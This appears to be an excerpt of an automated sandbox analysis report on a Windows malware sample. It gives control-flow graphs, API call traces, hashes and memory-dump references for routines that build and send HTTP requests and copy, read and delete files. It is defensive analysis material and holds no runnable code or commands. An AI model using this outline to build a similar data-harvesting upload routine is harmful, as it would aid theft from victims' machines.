                                                                                                                                                                                                                                              • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 339 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 362 404ee3 339->362 363 404eea-404eee 339->363 362->363 364 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 363->364 365 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 363->365 364->365 428 40500d-40501b 364->428 429 405029 428->429 430 40501d-405027 428->430 431 405033-405065 HttpOpenRequestA 429->431 430->431 432 40556b-405572 InternetCloseHandle 431->432 433 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap RtlAllocateHeap call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 431->433 432->365 587 4054ea-405514 InternetReadFile 433->587 588 405516-40551d 587->588 589 40551f-405565 InternetCloseHandle 587->589 588->589 591 405521-40555f call 416fb0 call 416ea0 call 416e00 588->591 589->432 591->587
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,04083B18,?,040874C8,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04083B48,00000000,?,04062038,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00405417
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                              • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                                                                                                              • API String ID: 1133489818-3705675087
                                                                                                                                                                                                                                              • Opcode ID: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
                                                                                                                                                                                                                                              • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 598 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 613 4056d4-4056d8 598->613 614 4056cd 598->614 615 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 613->615 616 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 613->616 614->613 625 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 615->625 626 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 615->626 616->615 700 40585c-40586a 616->700 626->625 701 405878 700->701 702 40586c-405876 700->702 703 405882-4058b5 HttpOpenRequestA 701->703 702->703 704 405c63-405c6a InternetCloseHandle 703->704 705 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 703->705 704->615 814 405be2-405c0c InternetReadFile 705->814 815 405c17-405c5d InternetCloseHandle 814->815 816 405c0e-405c15 814->816 815->704 816->815 818 405c19-405c57 call 416fb0 call 416ea0 call 416e00 816->818 818->814
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,04083B38), ref: 004056C3
                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,04083B58,00000000,?,04062038,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,04083B18,?,040874C8,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                              • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                                                                                                              • API String ID: 148854478-1022722094
                                                                                                                                                                                                                                              • Opcode ID: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
                                                                                                                                                                                                                                              • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1271 40a030-40a04c call 417070 1274 40a05d-40a071 call 417070 1271->1274 1275 40a04e-40a05b call 416e20 1271->1275 1281 40a082-40a096 call 417070 1274->1281 1282 40a073-40a080 call 416e20 1274->1282 1280 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1275->1280 1314 40a12d-40a134 1280->1314 1281->1280 1289 40a098-40a0b8 call 416e00 * 3 call 413220 1281->1289 1282->1280 1308 40a6cf-40a6d2 1289->1308 1315 40a170-40a184 call 416d40 1314->1315 1316 40a136-40a152 call 4170d0 * 2 CopyFileA 1314->1316 1322 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1315->1322 1323 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1315->1323 1327 40a154-40a16e call 416da0 call 415bd0 1316->1327 1328 40a16c 1316->1328 1380 40a319-40a331 call 4170d0 1322->1380 1323->1380 1327->1314 1328->1315 1390 40a680-40a692 call 4170d0 DeleteFileA call 417040 1380->1390 1391 40a337-40a355 1380->1391 1402 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1390->1402 1399 40a666-40a676 1391->1399 1400 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1391->1400 1407 40a67d 1399->1407 1401 40a372-40a382 1400->1401 1408 40a601-40a60e lstrlen 1401->1408 1409 40a388-40a42a call 416d40 * 6 call 417070 1401->1409 1402->1308 1407->1390 1411 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 1408->1411 1412 40a655-40a663 memset 1408->1412 1450 40a42c-40a43b call 416e20 1409->1450 1451 40a43d-40a446 call 416e20 1409->1451 1429 40a647-40a650 call 416e00 1411->1429 1412->1399 1429->1412 1455 40a44b-40a45d call 417070 1450->1455 1451->1455 1458 40a470-40a479 call 416e20 1455->1458 1459 40a45f-40a46e call 416e20 1455->1459 1463 40a47e-40a48e call 4170b0 1458->1463 1459->1463 1466 40a490-40a498 call 416e20 1463->1466 1467 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1463->1467 1466->1467 1467->1401
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2228671196-0
                                                                                                                                                                                                                                              • Opcode ID: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
                                                                                                                                                                                                                                              • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1973479514-0
                                                                                                                                                                                                                                              • Opcode ID: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
                                                                                                                                                                                                                                              • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
